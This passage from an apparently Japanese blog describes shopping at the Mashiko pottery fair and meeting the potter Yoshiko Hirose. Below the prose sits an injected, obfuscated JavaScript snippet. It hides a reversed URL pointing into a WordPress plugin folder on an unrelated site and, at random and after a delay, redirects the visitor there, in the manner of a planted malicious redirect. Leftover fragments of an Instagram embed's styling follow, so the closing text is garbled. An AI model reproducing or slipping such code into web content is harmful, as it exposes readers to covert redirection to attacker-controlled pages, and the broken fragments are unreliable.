益子陶器市の魅力は、普段なかなか話す機会のない作家さんと直接言葉をかわしながら、お買い物ができること。作り手の方の想いや作品ができるまでのストーリーを聞くと、うつわにとても愛着がわいてきます。

今回お話を伺った若手陶芸家の広瀬佳子さんも、作品が売れることを「お嫁に行く」と表現しているほど、まさに我が子のように大切に一品一品作りあげているのだなと感じました。

シックな色味と、エレガントなかたちが魅力の広瀬さんのうつわは、特に女性から大人気で、CAKE.TOKYOチームが広瀬さんのテントに到着したころには、すでにこの洋皿シリーズは完売……(泣)。

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to -44px; position:relative; top:-22px; width:44px;”>

top:8px; overflow:hidden; padding:8px 0 7px; text-align:center; text-overflow:ellipsis; white-space:nowrap;”>YOSHIKO HIROSEさん(@si1si1wu3)が投稿した写真